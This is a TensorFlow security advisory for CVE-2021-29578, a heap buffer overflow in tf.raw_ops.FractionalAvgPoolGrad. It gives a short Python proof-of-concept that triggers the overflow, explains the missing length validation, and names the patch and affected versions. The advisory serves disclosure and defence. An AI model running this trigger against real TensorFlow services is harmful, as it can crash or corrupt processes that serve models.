1## TFSA-2021-067: Heap buffer overflow in `FractionalAvgPoolGrad` 2 3### CVE Number 4CVE-2021-29578 5 6### Impact 7The implementation of `tf.raw_ops.FractionalAvgPoolGrad` is vulnerable to a heap 8buffer overflow: 9 10```python 11import tensorflow as tf 12 13orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) 14out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) 15row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) 16col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) 17 18 19tf.raw_ops.FractionalAvgPoolGrad( 20 orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, 21 row_pooling_sequence=row_pooling_sequence, 22 col_pooling_sequence=col_pooling_sequence, overlapping=False) 23``` 24 25The 26[implementation](https://github.com/tensorflow/tensorflow/blob/dcba796a28364d6d7f003f6fe733d82726dda713/tensorflow/core/kernels/fractional_avg_pool_op.cc#L216) 27fails to validate that the pooling sequence arguments have enough elements as 28required by the `out_backprop` tensor shape. 29 30### Patches 31We have patched the issue in GitHub commit 32[12c727cee857fa19be717f336943d95fca4ffe4f](https://github.com/tensorflow/tensorflow/commit/12c727cee857fa19be717f336943d95fca4ffe4f). 33 34The fix will be included in TensorFlow 2.5.0. We will also cherrypick this 35commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 362.1.4, as these are also affected and still in supported range. 37 38### For more information 39Please consult [our security 40guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for 41more information regarding the security model and how to contact us with issues 42and questions. 43 44### Attribution 45This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu 46X-Team. 47